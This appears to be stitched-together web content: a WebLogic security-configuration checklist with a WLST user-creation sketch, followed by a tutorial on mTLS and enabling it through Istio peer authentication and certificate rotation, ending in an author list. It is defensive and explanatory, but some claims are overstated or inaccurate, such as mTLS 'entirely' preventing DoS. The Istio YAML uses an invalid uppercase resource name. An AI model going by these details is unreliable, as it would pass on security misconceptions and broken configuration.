Configure the security providers: WebLogic Server provides several security providers, including the default security provider, LDAP security provider, and RDBMS security provider. Configure the security plug-in: The security plug-in is a WebLogic Server component that provides authentication and authorization services to protect your resources. You can configure the security plug-in using the WebLogic Administration Console or the WLST scripting tool. Configure custom security providers: If the default security providers do not meet your security requirements, you can develop custom security providers. You can develop custom security providers using the WebLogic Server API or the Security Provider APIs. Test the security configuration: After configuring the security plug-in or custom security providers, you should test the security configuration thoroughly to ensure that it is working as expected. Monitor the security configuration: It is important to monitor the security configuration to ensure that it is running smoothly. This includes monitoring security logs, error logs, and other important metrics. Following these steps, you can configure the security plug-in or custom security providers for resource protection in WebLogic Server.
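To make the "configure the security realm" step more tangible, here is a hedged WLST sketch that creates a user and a group in the default authenticator. The admin URL, credentials, domain name (mydomain), realm name (myrealm), and user/group names are all placeholders, and the exact MBean path should be checked against your WebLogic version:
Python
# WLST scripts are Jython; run with: wlst.sh create_realm_users.py
connect('weblogic', 'welcome1', 't3://localhost:7001')   # placeholder admin credentials/URL

serverConfig()
# Navigate to the DefaultAuthenticator of the default realm; adjust domain/realm names as needed.
cd('/SecurityConfiguration/mydomain/Realms/myrealm/AuthenticationProviders/DefaultAuthenticator')

cmo.createUser('appmonitor', 'Welcome1#', 'Monitoring user for the sample application')
cmo.createGroup('AppOperators', 'Operators allowed to manage the sample application')
cmo.addMemberToGroup('AppOperators', 'appmonitor')

disconnect()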
This is a detailed guide on mTLS and how to implement it with Istio service mesh. We will be covering the following topics here: Understanding the mTLS protocol with respect to the TCP/IP suite SSL vs TLS vs mTLS Why is mTLS important? Use cases of mTLS Certificate authority, public keys, X.509 certificates: Must-know mTLS concepts How does mTLS work? How to enable mTLS with Istio service mesh Certificate management for mTLS in Istio What Is mTLS? Mutual Transport Layer Security (mTLS) is a cryptographic protocol designed to authenticate two parties and secure their communication on the network. The mTLS protocol is an extension of the TLS protocol in which both parties - the web client and the web server - are authenticated. The primary aim of mTLS is to achieve the following: Authenticity: To ensure both parties are authentic and verified Confidentiality: To secure the data in transmission Integrity: To ensure the correctness of the data being sent mTLS protocol: A Part of the TCP/IP Suite The mTLS protocol sits between the application and transport layers and encrypts only messages (or packets). It can be seen as an enhancement to the TCP protocol, sitting conceptually just above TCP in the TCP/IP protocol suite. SSL vs TLS vs mTLS: Which Is New? Security engineers, architects, and developers use SSL, TLS, and mTLS interchangeably, often because of their similarity. Loosely speaking, mTLS is an enhancement to TLS, and TLS is an enhancement to SSL. The first version of Secure Socket Layer (SSL) was developed by Netscape in 1994; the most popular versions were versions 2 and 3, created in 1995. It was so widely popular that it even made its way into one of the James Bond movies, Tomorrow Never Dies (1997). The overall working of SSL is carried out by three sub-protocols: Handshake protocol: This is used to authenticate the web client and the web server and establish a secured communication channel. During the handshake, a shared key is generated, valid only for the session, to encrypt the data during communication. Record protocol: This protocol helps maintain the confidentiality of data in the communication between the client and the server using the newly generated shared secret key. Alert protocol: In case the client or the server detects an error, the alert protocol closes the SSL connection (the transmission of data is terminated), destroying all the sessions, shared keys, etc. As internet applications multiplied, the requirement for fine-grained security of data on the network grew. So Transport Layer Security (TLS) - a standardized internet version of SSL - was developed by the IETF. Netscape handed the SSL project over to the IETF, and TLS is an advanced version of SSL; the core idea and implementation of the protocol are the same. The main difference between the SSL and TLS protocols is that the cipher suites (the algorithms) used to encrypt data in TLS are more advanced. Additionally, the handshake, record, and alert protocols were modified and optimized for internet usage. Note: In the SSL handshake protocol, the server was required to authenticate to the client by sending its certificate, while the client's authentication was optional. TLS, as commonly deployed, likewise only authenticates the web server to the client, not vice versa. Almost all the websites you visit over HTTPS use TLS certificates to establish themselves as genuine sites.
If you visit Google.com and click the padlock symbol, it will show the TLS certificates. TLS was mainly used for web applications where the client is an end user, and ensuring the authentication of billions of clients or users is feasible for only some web applications. But as large monolithic applications broke into numerous microservices that communicate over the internet, the need for mTLS grew quickly. The mTLS protocol ensures that both the web client and the web server authenticate themselves before a handshake. (We will see the working model of the mTLS protocol later in this article.) Why Is mTLS More Important Than Ever? Modern business is done using web applications whose underlying architecture follows a hybrid cloud model. Microservices are distributed across public/private clouds, Kubernetes, and on-prem VMs, and the communication among the various microservices and components happens over the network, posing a significant risk of hacking or malicious attacks. Below are a few scenarios of cyberattacks on the web that can be avoided entirely by using the mTLS protocol. Man-in-the-middle attack (MITM): Attackers can place themselves between a client and a server to intercept the data during transmission. When mTLS is used, attackers cannot authenticate themselves and will fail to steal the data. IP spoofing: Another case is when bad actors masquerade as someone you trust and inject malicious packets toward the receiver. This is again solved by endpoint authentication in mTLS, which determines with certainty whether network packets or data originate from a source we trust. Packet sniffing: An attacker can place a passive receiver near a wireless transmitter to obtain a copy of every packet transmitted. Such an attack is prevalent in the banking and fintech domains, where an attacker wants to steal sensitive information such as card numbers, banking application usernames, passwords, SSNs, etc. Since packet sniffing is non-intrusive, it is tough to detect. Hence, the best way to protect data is to involve cryptography. mTLS helps encrypt the data using complex cryptographic algorithms that are hard for packet sniffers to decipher. Denial-of-service (DoS) attacks: The attackers aim to make the network or the web server unusable by legitimate applications or users. This is done by sending malicious packets, sending a deluge of packets, or opening a large number of TCP connections to the hosts (or the web server) so that the server ultimately crashes. DoS and distributed DoS (an advanced DoS technique) attacks can be mitigated by invoking the mTLS protocol in the applicable communication: malicious requests are discarded before entering the handshake phase. Use Cases of mTLS in the Industry The use cases of mTLS are growing daily with the increasing amount of business done through web applications and the simultaneous rise in threats of cyberattacks. Here are a few important use cases based on our experience in discussions with leaders from various industries and domains: banking, fintech, and online retail companies. Hybrid cloud and multicloud applications: Whenever organizations use a mix of data centers - on-prem, public, or private cloud - the data leaves the secured perimeter and goes out of the network. In such cases, mTLS should be used to protect the data. Microservices-based B2B software: Much of the B2B software in the market follows a microservices architecture, with each service talking to the others using REST APIs.
Even though all the services are hosted in a single data center, the network should be secured to protect the data in transit (in case the firewall is breached). Online retail and e-commerce applications: Usually, e-commerce and online retail applications use a Content Delivery Network (CDN) to fetch the application from the server and serve it to users. Although TLS is implemented in the CDN so it can authenticate itself when a user visits the page, there should also be a security mechanism that secures the network between the CDN and the origin web server through mTLS. Banking applications: Applications that carry sensitive transactions, such as banks, financial transaction apps, payment gateways, etc., should take extreme precautions to prevent their data from being stolen. Millions of online transactions happen every day using various banking and fintech apps. Sensitive information such as bank usernames, passwords, debit/credit card details, CVV numbers, etc., can easily be stolen if the data on the network is not protected. Strict authentication and confidentiality can be applied to the network using mTLS. Industry regulation and compliance: Every country has rules and standards to govern IT infrastructure and protect data. Policies and standards such as FIPS, GDPR, PCI DSS, HIPAA, ISO 27001, etc., outline strict security measures to protect data at rest and data in transit. mTLS provides the strict authentication required on the network and helps companies adhere to these various standards. Below are a few concepts one needs to be aware of before understanding how mTLS works. (You can skip this part if you are already comfortable with them.) Certificates and Public/Private Keys: Must-Know mTLS Concepts Certificates A (digital) certificate is a small computer file issued by a certificate authority (CA) to authenticate a user, an application, or an organization. A digital certificate contains information such as the name of the certificate holder, the serial number of the certificate, the expiry date, the public key, and the signature of the issuing authority. Certificate Authority (CA) A certificate authority (CA) is a trusted third party that verifies an applicant's identity and issues a signed digital certificate containing the applicant's public key and other information. Notable CAs include VeriSign, Entrust, Let's Encrypt, Safescript Limited, etc. Root CA/Certificate Chain Certificate authority hierarchies are created to distribute the workload of issuing certificates, with different CAs issuing certificates at various levels. In this multi-level (parent-and-child) hierarchy of CAs, the CA at the top is called the root CA. Each CA also has its own certificate issued by its parent CA, while the root CA has a self-signed certificate. To ensure the CA that issued a certificate to the client or server is trusted, the security protocol suggests that entities send their digital certificate along with the entire chain leading up to the root CA. Public and Private Key Pair While creating certificates for an entity, a public and a private key - commonly called a key pair - are generated. The public and private keys are used to authenticate the entity's identity and encrypt data. Public keys are published, but the private key is kept secret. If you are interested in the algorithms used to generate key pairs, read more about RSA, DSA, ECDSA, and Ed25519.
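As a small, hedged illustration of the key pair concept, the JDK can generate an RSA key pair whose public key is encoded in the X.509 format discussed next; the 2048-bit key size is simply a common choice, not a recommendation specific to this article:
Java
import java.security.KeyPair;
import java.security.KeyPairGenerator;

public class KeyPairDemo {
    public static void main(String[] args) throws Exception {
        KeyPairGenerator generator = KeyPairGenerator.getInstance("RSA");
        generator.initialize(2048); // a commonly used RSA key size

        KeyPair pair = generator.generateKeyPair();

        // The JDK encodes the public key in X.509 format and the private key in PKCS#8.
        System.out.println("Public key encoding:  " + pair.getPublic().getFormat());
        System.out.println("Private key encoding: " + pair.getPrivate().getFormat());
    }
}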
X.509 Certificate An X.509 certificate is a special category of certificate, defined by the International Telecommunication Union, that binds an application's identity (hostname, organization name, etc.) to a public key using a digital signature. It is the certificate format most commonly used by the SSL/TLS/mTLS protocols for securing web applications. How Does mTLS Work? As explained earlier, mTLS implements sub-protocols similar to SSL's. Two applications talking to each other using the mTLS protocol go through the following phases. Establish security capabilities with hello: The client tries to communicate with the server (this message is known as the client hello). The client hello message contains values for parameters such as the mTLS version, session ID, cipher suite, compression algorithm, etc. The server sends back a similar response, called the server hello, with the values it supports for the same parameters. Server authentication and key exchange: In this phase, the server shares its digital certificate (mostly X.509 certificates for microservices) and the entire chain leading up to the root CA with the client. It also requests the client's digital certificate. Client verifies the server's certificate: The client uses the public key in the digital certificate to validate the server's authenticity. Client authentication and key exchange: After validation, the client sends its digital certificate to the server for verification. Server verifies the client's certificate: The server verifies the client's authenticity. Master key generation and handshake complete: Once both parties' authenticity is established, the client and server complete the handshake, and two new keys are generated; this shared secret information is known only to the two parties and is active only for the session. Master secret: for encryption. Message Authentication Code (MAC): for assuring message integrity. Communication encrypted and transmission starts: The exchange of information begins, with all messages or packets encrypted using the master secret key. Behind the scenes, the mTLS protocol divides each message into smaller blocks called fragments, compresses each fragment, adds the MAC for each block, and finally encrypts them using the master secret. Data transmission starts: Finally, the mTLS protocol appends headers to the blocks of messages and hands them to the TCP protocol for delivery to the destination or receiver. Session ends: Once the communication completes, the session is closed. If an anomaly is detected during the transmission, the mTLS protocol destroys all the keys and secrets and terminates the session immediately. Note: In the above phases, we have assumed that the CA has issued certificates to the entities and that those certificates are still valid. In reality, certificates for mission-critical applications expire quickly, and there is a requirement for constant certificate rotation (we will jump straight into how Istio enables mTLS and certificate rotation). How To Enable mTLS and Certificate Rotation Using Istio Service Mesh Istio service mesh is an infrastructure layer that abstracts the network and security layers out of the application layer. It does so by injecting an Envoy proxy (an L4 and L7 sidecar proxy) alongside each application and listening to all the network communication.
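For the sidecar injection just described to happen automatically, the target namespace is typically labeled for injection. A minimal sketch follows; the istio-nm namespace name matches the policy example in the next section, and it assumes the default Istio injection webhook is installed:
YAML
apiVersion: v1
kind: Namespace
metadata:
  name: istio-nm
  labels:
    istio-injection: enabled   # tells Istio's webhook to inject the Envoy sidecar into new pods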
mTLS Implementation in Istio Though Istio supports multiple authentication types, it is best known for implementing mTLS for applications hosted on cloud, on-prem, or Kubernetes infrastructure. The Envoy proxies act as Policy Enforcement Points (PEPs); you can implement mTLS using the peer authentication policy provided by Istio and enforce it through the proxies at the workload level. Example of a peer authentication policy in Istio that applies mTLS to the demobank app in the istio-nm namespace: YAML apiVersion: security.istio.io/v1beta1 kind: PeerAuthentication metadata: name: "mTLS-peer-policy" namespace: "istio-nm" spec: selector: matchLabels: app: demobank mtls: mode: STRICT The working mechanism of mTLS authentication in Istio is as follows: At first, all the outbound and inbound traffic to any application in the mesh is re-routed through the Envoy proxy. The mTLS exchange happens between the client-side Envoy proxy and the server-side Envoy proxy. The client-side Envoy proxy connects to the server-side Envoy proxy, and the two exchange certificates and prove their identities. Once the authentication phase is completed successfully, a secure connection between the client-side and server-side Envoy proxies is established to carry out encrypted communication. Note that mTLS with Istio can be implemented at all levels: workload, namespace, or mesh-wide (a mesh-wide sketch appears at the end of this article). Certificate Management and Rotation in Istio Service Mesh Istio provides a stronger identity by issuing X.509 certificates to the Envoy proxies attached to applications. Certificate management and rotation are handled by an Istio agent running in the same container as the Envoy proxy. The Istio agents talk to Istiod - the Istio control plane - to circulate the digital certificates and public keys. Below are the detailed phases of certificate management in Istio: Istio agents generate key pairs (a private and a public key) and then send the public key to the Istio control plane for signing; this is called a certificate signing request (CSR). Istiod has a component (formerly the standalone Citadel) that acts as the CA. Istiod validates the public key in the request, signs it, and issues a digital certificate to the Istio agent. When an mTLS connection is required, Envoy proxies fetch the certificate from the Istio agent using the Envoy secret discovery service (SDS) API. The Istio agent monitors the expiration of the certificate used by Envoy and, as the certificate approaches expiry, initiates a new CSR to Istiod. Network Security With Open-Source Istio Microservices architecture is the norm nowadays. The distributed nature of these applications presents a large attack surface for intruders, since the applications communicate with each other over a network. Security cannot be an afterthought in such a scenario, as that can lead to catastrophic data breaches. Implementing mTLS with Istio is an effective way to secure communication between cloud-native applications, and many leading companies, like Splunk, Airbnb, and Salesforce, use open-source Istio to enable mTLS and enhance the security of their applications.
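As the closing companion to the namespace-scoped policy shown above, a mesh-wide STRICT policy is conventionally created in the Istio root namespace (istio-system by default). This is a minimal sketch and should be rolled out carefully, since it rejects any remaining plaintext traffic in the mesh:
YAML
apiVersion: security.istio.io/v1beta1
kind: PeerAuthentication
metadata:
  name: default
  namespace: istio-system   # the root namespace makes the policy apply mesh-wide
spec:
  mtls:
    mode: STRICT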
Apostolos Giannakidis
Product Security,
Microsoft
Samir Behara
Senior Cloud Infrastructure Architect,
AWS
Boris Zaikin
Senior Software Cloud Architect,
Nordcloud GmBH
Anca Sailer
Distinguished Engineer,
IBM